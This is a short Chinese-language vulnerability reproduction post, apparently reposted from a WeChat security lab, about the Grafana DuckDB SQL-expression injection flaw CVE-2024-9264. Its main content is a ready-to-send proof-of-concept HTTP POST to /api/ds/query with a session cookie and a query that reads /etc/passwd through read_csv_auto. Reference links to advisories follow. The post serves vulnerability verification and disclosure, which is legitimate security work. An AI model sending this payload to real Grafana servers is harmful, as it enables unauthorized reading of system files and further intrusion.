Grafana是Grafana开源的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。
Grafana存在安全漏洞,该漏洞源于SQL表达式实验性功能在处理用户输入的duckdb查询时,未能充分清理,导致命令注入和本地文件包含漏洞。
1.访问漏洞环境
POC
漏洞复现
POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q100 HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Cookie: grafana_session=a739fa9aeb235f2790f17de00fefe528
Content-Length: 368
{
"from": "1696154400000",
"to": "1696345200000",
"queries": [
{
"datasource": {
"name": "Expression",
"type": "__expr__",
"uid": "__expr__"
},
"expression": "SELECT * FROM read_csv_auto('/etc/passwd');",
"hide": false,
"refId": "B",
"type": "sql",
"window": ""
}
]
}
测试,通过响应判断漏洞存在。
https://zekosec.com/blog/file-read-grafana-cve-2024-9264/
https://github.com/grafana/grafana
https://grafana.com/security/security-advisories/cve-2024-9264/
原文始发于微信公众号(弥天安全实验室):【成功复现】Grafana DuckDB表达式注入漏洞(CVE-2024-9264)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论